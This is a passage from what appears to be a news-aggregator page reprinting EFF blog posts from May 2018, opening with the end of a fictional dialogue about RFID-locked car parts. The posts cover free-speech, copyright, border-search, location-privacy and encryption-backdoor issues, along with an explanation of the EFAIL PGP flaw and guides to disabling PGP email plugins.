Your car manufacturer standardized them across most its models. In fact, it’s pretty much exactly that one up on the wall over there.” “Well, just use that one, then.” “I’d love to, but I can’t. You have the sport model of your car, and so your manufacturer requires you to use the sport timing chain.” “What’s the difference?” “No difference, except they call it the ‘sport model.’ And they charge $60 more for it.” “So if it’s the same then you should just be able to use the one up there.” “I’d love to. But the chains have a small RFID transmitter in them.” “So?” “So if I put the wrong timing chain in, the car will know.” “And then what?” “Then it won’t start. Your information screen will tell you that you need a different part. And then it will just sit there.” “The car won’t work at all?” “Well, you can run the radio. But it won’t move.” “You’re telling me that you can’t use that timing chain, even though it’s exactly the same as the one the car needs.” “Pretty much.” “Because I have the sport model.” “Yup.” “Can’t you just lose the RFID chip?” “Then it definitely won’t work. No chip, no ignition.” “That can’t be legal.” “It’s covered in the car’s EULA. You clicked through it the first time you used the radio.” “But it’s just a code in the chip, right? Can’t you download a working code from the internet and put it in any chip?” “Technically? Yes. Easy as pie. Legally? No. They could pop me for $500,000 and five years in prison.” “You’re joking.” “Sir, I am most definitely not joking.” “Fine. Can you get the sport timing chain?” “Yes.” “Good.” “In three weeks.” “What?!?” “Back order. I mean, probably three weeks? We’re in a trade war. The timing chains are made in Asia. They’re in a cargo ship in Hong Kong, waiting clearance to come over.” “So I can’t drive my car for three weeks because of a stupid timing chain.” “We could tow the car to a dealer. They might have a sport chain. The closest dealer that can service this particular model is three counties away. But I’d call first to make sure they have it. Otherwise we’ll have towed you all that way for nothing, and you’ll still have to pay us.” “I kind of need this car to work today.” “I know, Mr. Jones. And when we get the part, it’ll be literally a twenty-minute fix.” “Twenty minutes and three weeks, you mean.” “Probably three weeks. Maybe longer.” “I need a drink.” “We do have coffee, Mr. Jones.” “Well, that’s something.” “It’s decaf.”  
>> mehr lesen

EFF Sues Texas A&M University For Violating PETA's Free Speech Rights By Blocking Group From Its Facebook Page (Mo, 14 Mai 2018)
Posts Criticizing Medical Research on Dogs Blocked, Deleted Houston, Texas—The Electronic Frontier Foundation (EFF) sued Texas A&M University on behalf of People for the Ethical Treatment of Animals (PETA) for blocking comments on its official Facebook page that mention PETA by name or use certain words to criticize the university’s use of dogs in muscular dystrophy experiments. The school, the nation’s second-largest public university by student enrollment, won’t publish any post containing the animal rights group’s name, or posts containing at least 11 words, including “cruelty,” “abuse,” “torture,” “lab,” “testing,” and “shut.” The censorship started after PETA began an advocacy campaign against Texas A&M for a medical research lab studying muscular dystrophy in dogs for the purposes of finding a cure for the human version of the disease. The lab breeds golden retrievers to develop the illness, and subjects the dogs to cruel and inhuman treatment, PETA maintains. The organization uses social media, including Facebook, to publicize its campaign. The Facebook page of Texas A&M contains information about its educational, medical research, and sports programs, as well as its students and community members. Anyone on Facebook who visits the site is invited to “write something on this page,” comment on posts, and reply to posts by the university or visitors to the page. Posts and comments aren’t confined to university affairs—topics range from animal welfare and the environment to sexual awareness and the weather. In a complaint filed today in U.S. District Court for the Southern District of Texas, PETA maintains that the Texas A&M Facebook page is a government-controlled forum for speech that, under the First Amendment, can’t exclude speech based on the speaker’s expressed viewpoint. That the term “PETA”—and words frequently used in the group’s anti-cruelty campaign against the school’s dog lab—are blocked demonstrates the university’s intent to silence PETA and others opposed to animal testing from expressing their views in the Facebook forum. “Speaker-based and viewpoint-based discrimination of speech in a designated public forum like the university’s Facebook page is rarely permitted under the First Amendment,” said EFF Civil Liberties Director David Greene. "We are asking a judge to declare that Texas A&M’s restrictions against PETA on its Facebook page are unconstitutional and require the university to repost PETA’s content on the site and stop blocking PETA from posting and commenting on the site.” EFF has taken a stand for the First Amendment rights of individuals and groups to receive and comment on social media posts used government to conduct the work of government. When federal, state, and local agencies and elected officials—even the president—use social media platforms like Facebook and Twitter to communicate directly with the public about programs, policies, and opinions, the First Amendment sharply restricts the government’s ability to prevent us from receiving and commenting on those communications. “Our First Amendment rights are infringed when agencies and officials block the posts they don’t like or agree with,” said Greene. “And the rights of all readers are affected when the government manipulates it social media pages to make it appear that its policies and practices are embraced, rather than condemned.” For the complaint: https://www.eff.org/document/peta-v-texas-am For more on First Amendment rights and social media: https://www.eff.org/deeplinks/2017/11/when-officials-tweet-about-government-business-they-dont-get-pick-and-choose-who   Contact:  Adam Schwartz Senior Staff Attorney adam@eff.org Camille Fischer Frank Stanton Fellow cfischer@eff.org
>> mehr lesen

Keep Old Recordings From Getting a New and Confusing Copyright Law (Mo, 14 Mai 2018)
The newest version of the Music Modernization Act, S. 2823, added in provisions from the bill known as CLASSICS, turning a largely great bill into a bad one. We have to tell the Senate to reject this version of the bill. S. 2823 was introduced by Sen. Orrin Hatch on May 10. It follows the bad precedent set by the House of Representatives by combining the largely good Music Modernization Act with the bad CLASSICS Act. An act which would establish a new system for compensating songwriters and music publishers when their songs are played on digital services has now been polluted by an act which creates a new pseudo-copyright that presents new barriers for fans of old music. S. 2823 extends parts of federal copyright to cover sound recordings made before 1972, which are currently covered by an assortment of state laws. With this new law, for the first time, recordings made between 1923 and 1972 couldn’t be streamed on digital music services or Internet radio without a license, and failing to get one could leave the streamer liable for massive, unpredictable statutory damages. This makes it harder to archive older music and harder for fans of older music to stream it. It also doesn’t create any new incentives for artists to create new work. All of this music is old enough to have already made plenty of money for the rightsholders, which are usually recording companies and not the artists in the first place. The Senate should not pass music copyright reform with this new pseudo-copyright in it. Tell the Senate to reject S. 2823. Take Action Stop S. 2823
>> mehr lesen

Victory in Alasaad for Our Digital Privacy at the Border (Mo, 14 Mai 2018)
Government searches of cell phones, laptops, and other electronic devices without a warrant when we cross the U.S. border may violate the First and Fourth Amendments, according to a powerful ruling by a federal court last week in a civil rights lawsuit brought by EFF and the ACLU. It is the latest and greatest of a growing wave of judicial opinions challenging the government’s claim that it can ransack and confiscate our electronic devices—just because we travel internationally. By allowing the EFF and ACLU case to proceed, the district court signaled that the government’s invasion of people’s digital privacy and free speech rights at the border raises significant constitutional concerns. This post analyzes the decision and explains what’s next for the case. Our Lawsuit In Alasaad v. Nielsen, we sued on behalf of 11 travelers, arguing that the First and Fourth Amendments require border officers to get a warrant before searching our electronic devices. We also argue that the Fourth Amendment requires border officers to have probable cause before confiscating our electronic devices for weeks or months. We seek an “injunction” against the U.S. Department of Homeland Security, U.S. Customs and Border Protection, and U.S. Immigration and Customs Enforcement, meaning a command from a judge to end these practices. The government moved to dismiss on two grounds. First, they claimed our clients lacked “standing” to seek an injunction, because supposedly our clients could not prove a sufficient risk of being searched again. Second, on the merits, the government claimed that the First and Fourth Amendments do not require border officers to have any suspicion at all before searching and confiscating travelers’ electronic devices. We filed an opposition brief refuting the government’s arguments. We were buoyed by three strong amicus briefs (a.k.a. friend-of-the-court briefs). The court held an oral argument to explore the issues. The district court rejected the government’s arguments, denied their motion to dismiss, and allowed us to proceed with our case. In her opinion, the judge made a host of critical rulings about how the Constitution protects digital privacy and free speech at the border. Fourth Amendment Limits on Device Searches at the Border The Alasaad court’s analysis rested significantly on the Supreme Court’s holding in Riley v. California (2014) that the Fourth Amendment requires police officers to get a warrant before searching the cell phones of arrestees. In Riley, the Court balanced the privacy interests in cell phones against the government’s interests in conducting warrantless searches incident to arrest—specifically, officer safety and evidence preservation. On the privacy side of the balance, the Alasaad court explained that “electronic devices implicate privacy interests in a fundamentally different manner than searches of typical containers or even searches of a person.” The court also extensively quoted the Supreme Court’s Riley decision, including how with digital devices, “The sum of an individual’s private life can be reconstructed through a thousand photographs labeled with dates, locations, and descriptions” dating back to the purchase of the phone. In the opinion, the court stated: “a person’s internet browsing history, historic location information, and mobile application software (or ‘apps’) ‘can form a revealing montage of the user’s life.’ Indeed, the Court stated that “a cell phone search would typically expose to the government far more than the most exhaustive search of a house.’” To illustrate the way that cell phone searches burden privacy, the Alasaad court highlighted that two of the plaintiffs are Muslim women with religious concerns about men viewing their hair: “Nadia Alasaad and Merchant object [to male border officers searching their phones] due to their photos on their phones of themselves without headscarves.” Additionally, some cases as well as CBP’s 2018 policy provide more privacy protection from “forensic” searches (when border officers deploy their own digital tools to analyze travelers’ devices), and less privacy protection from “manual” searches” (when border officers simply tap or mouse around the device). Plaintiffs reject this dichotomy, because manual searches can access virtually all of the information that forensic searches can access, and manual searches can take advantage of the automatic search tools built into travelers’ own devices. Significantly, the Alasaad court acknowledged that manual searches can be intrusive, too. On the government’s side of the scale, the Alasaad court relied on Riley to explain that warrantless searches of a “particular category of effects” such as cell phones must be sufficiently “tethered” to the government’s interests. At the border, the government’s interests in conducting warrantless searches are to collect duties and to prevent the entry of contraband and other harmful items. The question, then, is whether warrantless searches of electronic devices sufficiently advance these interests. The Alasaad court agreed with plaintiffs that there is an important difference between border officers conducting warrantless searches for “contraband” (where tethering is stronger), as opposed to conducting warrantless searches for “evidence” of contraband or other unlawful activity (where tethering is weaker). “electronic devices implicate privacy interests in a fundamentally different manner than searches of typical containers or even searches of a person.” To the degree that border officers are seeking digital contraband, the Alasaad court held that “it is unclear at this juncture the extent to which a warrant requirement would impede customs officers’ ability to ferret out such contraband.” The court explained, quoting Riley, that “recent technological advances make the process of obtaining a warrant more efficient.” Moreover, the court was not persuaded by the government’s claim that child pornography is a form of digital contraband that justifies warrantless searches of electronic devices. The court explained that Riley requires the government to show that the problem it wants to solve with warrantless searches is “prevalent.” The Alasaad court cited government data showing that “the vast majority” of child pornography is accessed on the Internet, and thus found it “unclear” whether there is a prevalent problem with travelers carrying such contraband over the border. Assuming that privacy interests outweigh government interests, the next question is what level of individualized suspicion a border officer must have before searching an electronic device. While the government asserts that the ceiling is “reasonable suspicion” (a lower level of protection), plaintiffs demand a warrant (the highest level of protection). The Alasaad court left this question open, but the judge suggested that a warrant might be preferable because the reasonable suspicion standard applied to border searches of electronic devices might provide “no practical limit at all.” First Amendment Limits on Device Searches at the Border The Alasaad court emphasized plaintiffs’ argument that when border officers search travelers’ electronic devices, they burden travelers’ First Amendment rights to free speech and association. Specifically, they expose membership in private advocacy organizations, unmask anonymous speech, and intrude on freedom of the press. Given these burdens, the court held that border device searches are subject to a strong First Amendment test: government must prove a “substantial relation between the governmental interest and the information required to be disclosed.” The court rejected an earlier judicial opinion suggesting that First Amendment scrutiny of border device searches would cause “headaches” for border officers. Quoting Riley, the Alasaad court explained that plaintiffs are not seeking a special or complicated rule; as with the Fourth Amendment claim, “what plaintiffs seek as a remedy here is ‘simple—get a warrant.’” The court in its opinion also cited examples from plaintiffs’ complaint to illustrate how border device searches burden travelers’ First Amendment rights: “While Dupin’s phone was being searched, he was questioned ‘about his work as a journalist, including the names of the organizations and specific individuals within those organizations for whom he had worked’; Gach was questioned ‘about his work as an artist’ prior to searching his phone; Kushkush was asked about ‘his reporting activities’; and Merchant was questioned at secondary inspection about her ‘religious affiliation’ and her blog.” Fourth Amendment Limits on Device Confiscations at the Border The Alasaad court held that plaintiffs plausibly alleged that border officers’ lengthy confiscations, without probable cause, of plaintiffs’ devices violated the Fourth Amendment. The court explained that seizures must be reasonable “not only at their inception but also for their duration.” The court emphasized plaintiffs’ allegations of a 10-month confiscation of Mr. Allababidi’s device, and a 56-day confiscation of Mr. Wright’s devices. Plaintiffs Have Standing The Alasaad court on two grounds held that plaintiffs sufficiently alleged standing to seek an injunction against the government for these First and Fourth Amendment violations. First, the court held that plaintiffs pled a substantial risk of future border searches and confiscations of their electronic devices. The court emphasized plaintiffs’ allegations that all plaintiffs will continue to travel across the U.S. border with their devices; that when they do so, they will be exposed to the government’s device search policies; and that plaintiffs can only avoid this risk by foregoing their right to travel or by traveling without their devices, which is impractical. The court rejected the government’s argument that the odds of future search are too low (the government asserts that they search the devices of 0.008% of travelers crossing the border). The court reasoned that “even a small probability of injury is sufficient”; that the absolute number of searches is large (over 30,000 per year); and that plaintiffs may be more likely than other travelers to suffer future searches, given that four plaintiffs have already been searched on multiple occasions, and that officers are alerted to past searches. Second, the court held that plaintiffs had standing to seek expungement of the information that the government seized from plaintiffs’ devices, to cure this ongoing harm resulting from the past unconstitutional searches of plaintiffs’ devices. The court emphasized plaintiffs’ allegation that government agencies “remain free to use and exploit [this seized information] and share it with other agencies that may do the same.” Next Steps EFF will continue to fight for digital privacy at the border, in Alasaad and other cases. The district court’s powerful new ruling puts a lot of wind in our sails. If you want to strengthen the privacy of your own digital information when you cross the border, check out our guide on how to do so. If you want to take direct action, contact your federal legislators and ask them to support a pending bill to require border officers to get a warrant before searching digital devices. The border is not a Constitution-free zone. Related Cases:  Alasaad v. Nielsen
>> mehr lesen

Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw (Mo, 14 Mai 2018)
Don’t panic! But you should stop using PGP for encrypted email and switch to a different secure communications method for now. A group of researchers released a paper today that describes a new class of serious vulnerabilities in PGP (including GPG), the most popular email encryption standard. The new paper includes a proof-of-concept exploit that can allow an attacker to use the victim’s own email client to decrypt previously acquired messages and return the decrypted content to the attacker without alerting the victim. The proof of concept is only one implementation of this new type of attack, and variants may follow in the coming days. Because of the straightforward nature of the proof of concept, the severity of these security vulnerabilities, the range of email clients and plugins affected, and the high level of protection that PGP users need and expect, EFF is advising PGP users to pause in their use of the tool and seek other modes of secure end-to-end communication for now. Because we are awaiting the response from the security community of the flaws highlighted in the paper, we recommend that for now you uninstall or disable your PGP email plug-in. These steps are intended as a temporary, conservative stopgap until the immediate risk of the exploit has passed and been mitigated against by the wider community. There may be simpler mitigations available soon, as vendors and commentators develop narrower solutions, but this is the safest stance to take for now. Because sending PGP-encrypted emails to an unpatched client will create adverse ecosystem incentives to open incoming emails, any of which could be maliciously crafted to expose ciphertext to attackers. While you may not be directly affected, the other participants in your encrypted conversations are likely to be. For this attack, it isn’t important whether the sender or the receiver of the original secret message is targeted. This is because a PGP message is encrypted to both of their keys. At EFF, we have relied on PGP extensively both internally and to secure much of our external-facing email communications. Because of the severity of the vulnerabilities disclosed today, we are temporarily dialing down our use of PGP for both internal and external email. Our recommendations may change as new information becomes available, and we will update this post when that happens. How The Vulnerabilities Work PGP, which stands for “Pretty Good Privacy,” was first released nearly 27 years ago by Phil Zimmermann. Extraordinarily innovative for the time, PGP transformed the level of privacy protection available for digital communications, and has provided tech-savvy users with the ability to encrypt files and send secure email to people they’ve never met. Its strong security has protected the messages of journalists, whistleblowers, dissidents, and human rights defenders for decades. While PGP is now a privately-owned tool, an open source implementation called GNU Privacy Guard (GPG) has been widely adopted by the security community in a number of contexts, and is described in the OpenPGP Internet standards document. The paper describes a series of vulnerabilities that all have in common their ability to expose email contents to an attacker when the target opens a maliciously crafted email sent to them by the attacker. In these attacks, the attacker has obtained a copy of an encrypted message, but was unable to decrypt it. The first attack is a “direct exfiltration” attack that is caused by the details of how mail clients choose to display HTML to the user. The attacker crafts a message that includes the old encrypted message. The new message is constructed in such a way that the mail software displays the entire decrypted message—including the captured ciphertext—as unencrypted text. Then the email client’s HTML parser immediately sends or “exfiltrates” the decrypted message to a server that the attacker controls. The second attack abuses the underspecification of certain details in the OpenPGP standard to exfiltrate email contents to the attacker by modifying a previously captured ciphertext. Here are some technical details of the vulnerability, in plain-as-possible language: When you encrypt a message to someone else, it scrambles the information into “ciphertext” such that only the recipient can transform it back into readable “plaintext.” But with some encryption algorithms, an attacker can modify the ciphertext, and the rest of the message will still decrypt back into the correct plaintext. This property is called malleability. This means that they can change the message that you read, even if they can’t read it themselves. To address the problem of malleability, modern encryption algorithms add mechanisms to ensure integrity, or the property that assures the recipient that the message hasn’t been tampered with. But the OpenPGP standard says that it’s ok to send a message that doesn’t come with an integrity check. And worse, even if the message does come with an integrity check, there are known ways to strip off that check. Plus, the standard doesn’t say what to do when the check fails, so some email clients just tell you that the check failed, but show you the message anyway. The second vulnerability takes advantage of the combination of OpenPGP’s lack of mandatory integrity verification combined with the HTML parsers built into mail software. Without integrity verification in the client, the attacker can modify captured ciphertexts in such a way that as soon as the mail software displays the modified message in decrypted form, the email client’s HTML parser immediately sends or “exfiltrates” the decrypted message to a server that the attacker controls. For proper security, the software should never display the plaintext form of a ciphertext if the integrity check does not check out. Since the OpenPGP standard did not specify what to do if the integrity check does not check out, some software incorrectly displays the message anyway, enabling this attack. This means that not only can attackers get access to the contents of your encrypted messages the second you open an email, but they can also use these techniques to get access to the contents of any encrypted message that you have ever sent, as long as they have a copy of the ciphertext. What's Being Done to Fix this Vulnerability It’s possible to fix the specific exploits that allow messages to be exfiltrated: namely, do better than the standard says by not rendering messages if their integrity checks don’t check out. Updating the protocol and patching vulnerable software applications would address this specific issue. Fixing this entirely is going to take time. Some software patches have already begun rolling out, but it will be some time before every user of every affected software is up-to-date, and even longer before the standards are updated. Right now, information security researchers and the coders of OpenPGP-based systems are poring over the research paper to determine the scope of the flaw. We are in an uncertain state, where it is hard to promise the level of protection users can expect of PGP without giving a fast-changing and increasingly complex set of instructions and warnings. PGP usage was always complicated and error-prone; with this new vulnerability, it is currently almost impossible to give simple, reliable instructions on how to use it with modern email clients. It is also hard to tell people to move off using PGP in email permanently. There is no other email encryption tool that has the adoption levels, multiple implementations, and open standards support that would allow us to recommend it as a complete replacement for PGP. (S/MIME, the leading alternative, suffers from the same problems and is more vulnerable to the attacks described in the paper.) There are, however, other end-to-end secure messaging tools that provide similar levels of security: for instance, Signal. If you need to communicate securely during this period of uncertainty, we recommend you consider these alternatives. We Need To Be Better Than Pretty Good The flaw that the researchers exploited in PGP was known for many years as a theoretical weakness in the standard—one of many initially minor problems with PGP that have grown in significance over its long life. You can expect a heated debate over the future of PGP, strong encryption, and even the long-term viability of email. Many will use today’s revelations as an opportunity to highlight PGP’s numerous issues with usability and complexity, and demand better. They’re not wrong: our digital world needs a well-supported, independent, rock-solid public key encryption tool now more than ever. Meanwhile, the same targeted populations who really need strong privacy protection will be waiting for the steps they can take to use email securely once again. We’re taking this latest announcement as a wake-up call to everyone in the infosec and digital rights communities: not to pile on recriminations or criticisms of PGP and its dedicated, tireless, and largely unfunded developers and supporters, but to unite and work together to re-forge what it means to be the best privacy tool for the 21st century. While EFF is dialing down our use of PGP for the time being (and recommend you do so too) we’re going to double-down on supporting independent, strong encryption—whether that comes from a renewed PGP, or from integrating and adapting the new generation of strong encryption tools for general purpose use. We’re also going to keep up our work improving the general security of the email ecosystem with initiatives like STARTTLS Everywhere. PGP in its current form has served us well, but “pretty good privacy” is no longer enough. We all need to work on really good privacy, right now. EFF’s recommendations: Disable or uninstall PGP email plugins for now. Do not decrypt encrypted PGP messages that you receive. Instead, use non-email based messaging platforms, like Signal, for your encrypted messaging needs. Use offline tools to decrypt PGP messages you have received in the past. Check for updates at our Surveillance Self-Defense site regarding client updates and improved secure messaging systems. 
>> mehr lesen

Disabling PGP in Outlook with Gpg4win (Mo, 14 Mai 2018)
Researchers have developed code exploiting several vulnerabilities in PGP (including GPG) for email. In response, EFF’s current recommendation is to disable PGP integration in email clients. Disabling PGP decryption in Outlook requires running the Gpg4win installer again so that you can choose not to have the GpgOL plug-in on your system. Your existing keys will remain available on your machine. Download and open the Gpg4win installer. You’ll then see the Gpg4win installer intro page.  Click “Next.” 3. Uncheck “GpgOL” from the dialog, but keep all the other options the same. Click “Next.” 4. Click “Install.”  It will now install to the specified location without Outlook integration. 5. Click “Finish.” Once the GpgOL plugin for Outlook is disabled, your emails will not be automatically decrypted in Outlook. Note that you will instead see the encrypted email as separate files which you can download and then read with the command line. These notes are based on Outlook 2016 and Windows 10.
>> mehr lesen

Disabling PGP in Apple Mail with GPGTools (Mo, 14 Mai 2018)
Researchers have developed code exploiting several vulnerabilities in PGP (including GPG) for email. In response, EFF’s current recommendation is to disable PGP integration in email clients. Disabling PGP decryption in Apple Mail requires deleting a “bundle” file used by the application. Your existing keys will remain available on your machine. 1. First, click the Mail icon in the dock.   2. Click “Mail” in the menu bar on the top of the screen, and select “Quit Mail.” This is to make sure it’s shut down completely before we continue. 3. Click the Finder icon in the Dock. 4. Click the “Go” menu in the menu bar on the top of the screen, and select “Go to Folder…” 5. This will open the “Go to Folder” window. Type this exact text: /Library/Mail/Bundles 5. At this point, you may see a folder with the “GPGMail.mailbundle” file. (If you don’t, return to step two, and in step 3 instead type exactly ~/Library/Mail/Bundles. You can type the ~ (tilde) character by holding shift and pressing the ` key, located directly below Esc on most keyboards.) 6. Move the file “GPGMail.mailbundle” to the trash, either by dragging it to the trash icon on the dock or by right-clicking it and selecting "Move to Trash." 6. At this point, you may be prompted to type your macOS administrator password. Type it in, and hit the “enter” key. You may see the file deletion dialogue displayed on the screen. Once the GPGMail.mailbundle file is in your trash, your emails will not be automatically decrypted in Apple Mail. Note that you will instead see the email as a Mail Attachment file paired with the encrypted.asc file. You can download this asc file and use it to decrypt the message on the command line.
>> mehr lesen

Disabling PGP in Thunderbird with Enigmail (Mo, 14 Mai 2018)
Researchers have developed code exploiting several vulnerabilities in PGP (including GPG) for email. In response, EFF’s current recommendation is to disable PGP integration in email clients. Disabling PGP decryption in Thunderbird only requires disabling the Enigmail add-on. Your existing keys will remain available on your machine. First click on the Thunderbird hamburger menu (the three horizontal lines). 2. Select “Add-Ons” from the right side of the menu that appears. 3. Select "Extensions" (the puzzle piece icon) on the left if it isn't selected already. Click “Disable” in the “Enigmail” row. Your Thunderbird instance will now be disconnected from PGP. Once the Enigmail plugin is disabled, your emails will not be automatically decrypted in Thunderbird. You can download this email as a file. Then, you can decrypt the message on the command line, described for each major operating system here: Windows macOS Linux
>> mehr lesen

Attention PGP Users: New Vulnerabilities Require You To Take Action Now (Mo, 14 Mai 2018)
UPDATE (5/14/18): More information has been released. See EFF's more detailed explanation and analysis here. A group of European security researchers have released a warning about a set of vulnerabilities affecting users of PGP and S/MIME. EFF has been in communication with the research team, and can confirm that these vulnerabilities pose an immediate risk to those using these tools for email communication, including the potential exposure of the contents of past messages. The full details will be published in a paper on Tuesday at 07:00 AM UTC (3:00 AM Eastern, midnight Pacific). In order to reduce the short-term risk, we and the researchers have agreed to warn the wider PGP user community in advance of its full publication. Our advice, which mirrors that of the researchers, is to immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email. Until the flaws described in the paper are more widely understood and fixed, users should arrange for the use of alternative end-to-end secure channels, such as Signal, and temporarily stop sending and especially reading PGP-encrypted email. Please refer to these guides on how to temporarily disable PGP plug-ins in: Thunderbird with Enigmail Apple Mail with GPGTools Outlook with Gpg4win   These steps are intended as a temporary, conservative stopgap until the immediate risk of the exploit has passed and been mitigated against by the wider community. We will release more detailed explanation and analysis when more information is publicly available.
>> mehr lesen

Senator Wyden Demands Answers from Prison Phone Service Caught Sharing Cellphone Location Data (Fr, 11 Mai 2018)
Do you use Verizon, AT&T, Sprint, or T-Mobile? If so, your real-time cell phone location data may have been shared with law enforcement without your knowledge or consent. How could this happen? Well, a company that provides phone services to jails and prisons has been collecting location information on all Americans and sharing it with law enforcement—with little more than a “pinky promise” from the police that they’ve obtained proper legal process. This week, Sen. Wyden called out that company, Securus Technologies, in a letter to the FCC demanding the agency investigate Securus’s practices. Wyden also sent letters to the major phone carriers asking for an accounting of all the third parties with which they share their customers’ information as well as what they think constitutes customer consent to that sharing. Wyden called on the carriers to immediately stop sharing data with any and all third parties that have misrepresented customer consent or abused their access to sensitive customer data like real-time location information. Securus Improperly Collects Data and Shares it with Law Enforcement Securus is one of the largest providers of telephone services to jails and prisons throughout the country and its technology enables inmates to make collect and prepaid calls to others outside of the facility—at outrageous, unnecessarily high prices. As part of that provision of service, Securus collects location information on everyone called by a prisoner. Securus has used its ability to collect this information to build an online portal that allows law enforcement to obtain the real-time location data of any customer of the country’s major cellphone carriers—not just people who call or receive calls from a prisoner. Worse, Securus doesn’t even check whether law enforcement requestors actually have legal authority to access the data in the first place, before sharing this private location information. Securus claims this location information is meant to identify and interdict planned importation of contraband into jails and prisons and coordinated escape attempts, and to respond to amber alerts. But that doesn’t explain why it should be getting access to the real-time location information of virtually anyone with a cellphone. Securus’s Services Appear Designed to Circumvent Federal Laws that Protect Private Customer Data Wireless telecommunications carriers are obligated by law to keep call location information so they can provide it in an emergency to first responders or the legal guardian or closest family in an emergency involving the risk of death or serious physical harm. But the same law also requires that every telco must protect the confidentiality of this information from unauthorized disclosure. FCC regulations expressly restrict telcos from sharing location information except where required by law, while providing the service for which the customer information was obtained, or with the express approval of the customer. The “big four” carriers of cellular wireless services, Verizon, AT&T, T-Mobile and Sprint, partner with and share location data with third-party location data aggregators, like Location Smart and 3CInteractive, so that they don’t have to organize and manage requests for location data themselves. For example, companies like banks may want to verify a customer’s location to verify a customer’s identity when they try to open a new bank account and prevent fraud. Generally, a user would have to provide consent for this kind of disclosure directly to the telco before that information could be released to the bank. But telcos receive so many requests for location information from so many companies, that they contract this out to third-party location data aggregators, who then provide that information to the customers. Securus appears to be taking advantage of this third-party aggregator system. It buys access to real-time location information through these third-party location data aggregators, which have a commercial relationship with the major wireless carriers, and then shares that information with government agencies for a profit. Securus confirmed to Sen. Wyden’s office that its web portal enables surveillance of customers of every major U.S. wireless carrier. It also confirmed that, outside of a check box, it does not take any additional steps to verify that documents uploaded by law enforcement agencies provide proper judicial authorization for real-time location surveillance. Nor does Securus conduct any review of surveillance requests. That means it doesn’t matter what a Securus customer uploads to the web portal—it could be a cat video for all we know—they will still get access to the real-time location data of the target of their inquiry by checking the box—without any consequences or accountability for misuse. Cellphone Location Data Sharing Appears to Trigger FCC Notice Requirements Such unauthorized location data sharing would appear to trigger notice requirements promulgated by the FCC in a series of rules governing access to Customer Proprietary Network Information (“CPNI”); namely “that carriers should be required to notify a customer whenever a security breach results in that customer’s CPNI being disclosed to a third party without that customer’s authorization.” The FCC’s safeguard rules also require telco carriers to maintain records that track access to customer CPNI records. Specifically, 47 CFR § 64.2009(c) of the Commission’s rules requires carriers to “maintain a record of all instances where CPNI was disclosed or provided to third parties, or where third parties were allowed access to CPNI,” and to maintain such records for a period of at least one year. These records could provide an avenue for tracking whether a customer’s data was shared with a company like Securus. Data Sharing May Also Violate the Fourth Amendment This term, the Supreme Court is reviewing a case that will impact the legality of Securus’s practices. In United States v. Carpenter, the Court is considering whether the Fourth Amendment requires law enforcement to get a warrant to access cell phone location data. We filed an amicus brief in Carpenter and in another case, United States v. Rios, arguing location data is extremely sensitive and must be protected by a warrant supported by probable cause. We carry our cell phones everywhere, and the location data they generate can be used to create a precise and comprehensive record of our everyday movements, such as when we visit the doctor, attend a protest, take a trip, meet with friends, or return home. Law enforcement shouldn’t have unfettered access to this data, whether they get it from Securus or directly from the phone companies. The Supreme Court’s opinion in Carpenter is expected by the end of June this year. EFF applauds Sen. Wyden and his staff for raising concerns about Securus’ real-time location tracking tool and the potentially unlawful practices of phone carriers that share customer location data with commercial partners without verifying assertions of legal authorization or customer consent. The fact that Securus was able to provide this service in the first place, shows that telcos do not properly control access to their customers’ private information. The FCC should find out what, if any, demonstration of lawful authority or customer consent each wireless telco carrier requires from their partners before they provide access to private, real-time customer location information and other CPNI and implement sanctions to deter telcos from shirking their responsibility for ensuring customer privacy and security in the future. To learn more about the latest issues in cell phone tracking, visit our Cell Tracking page.
>> mehr lesen

The Secure Data Act Would Stop Backdoors (Fr, 11 Mai 2018)
A new bill introduced in Congress gets encryption right. The bipartisan Secure Data Act would stop any government agency or court order from forcing a company to build backdoors into encrypted devices and communications. This welcome piece of legislation reflects much of what the community of encryption researchers, scientists, developers, and advocates have explained for decades—there is no such thing as a secure backdoor. Just last week, EFF convened a panel of true experts on Capitol Hill to explain why government-mandated backdoors face insurmountable technical challenges and will weaken computer security for all. Given that the DOJ and FBI continue to rely on flawed theoretical approaches to key escrow in pushing for “responsible encryption,” we’re glad to see some Congress members are listening to the experts and taking this important step to protect anyone who uses an encrypted device or service. EFF supports the Secure Data Act, introduced by Representatives Zoe Lofgren (D-CA), Thomas Massie (R-KY), Ted Poe (R-TX), Jerry Nadler (D-NY), Ted Lieu (D-CA), and Matt Gaetz (R-FL). You can read the full bill here. The two-page bill has sweeping safeguards that uphold security both for developers and users. As the bill says, “no agency may mandate or request that a manufacturer, developer, or seller of covered products design or alter the security functions in its product or service to allow the surveillance of any user of such product or service, or to allow the physical search of such product, by any agency.” This bill would protect companies that make encrypted mobile phones, tablets, desktop and laptop computers, as well as developers of popular software for sending end-to-end encrypted messages, including Signal and WhatsApp, from being forced to alter their products in a way that would weaken the encryption. The bill also forbids the government from seeking a court order that would mandate such alterations.  The lone exception is for wiretapping standards required under the 1994 Communications for Law Enforcement Act (CALEA), which itself specifically permits providers to offer end-to-end encryption of their services. The Secure Data Act is thus the polar opposite of the Burr-Feinstein proposal introduced in the wake of the confrontation between Apple and the FBI in the San Bernardino case, which would have allowed sweeping court orders to require technical assistance from companies like Apple. We’ve explained before that this type of mandate is unconstitutional, likely violating the First Amendment. And, as an internal DOJ report recently demonstrated, the FBI did not need Apple’s assistance in the San Bernardino case because it had the resources at its disposal to unlock the iPhone belonging to the shooter. Nevertheless, the Bureau did not make its capabilities known to courts, Congress, and the public. Legislation like the Secure Data Act would both prevent another such fight from playing out and also head-off the risk of wrong-headed legislation like the Burr-Feinstein proposal. EFF thanks the sponsors and co-sponsors of the Secure Data Act: Reps. Lofgren, Massie, Poe, Nadler, Lieu, and Gaetz.   Related Cases:  Apple Challenges FBI: All Writs Act Order (CA)
>> mehr lesen

Hearing Monday: EFF Asks Appeals Court To Rule Copyright Can't Be Used To Control the Public's Access to Our Laws (Fr, 11 Mai 2018)
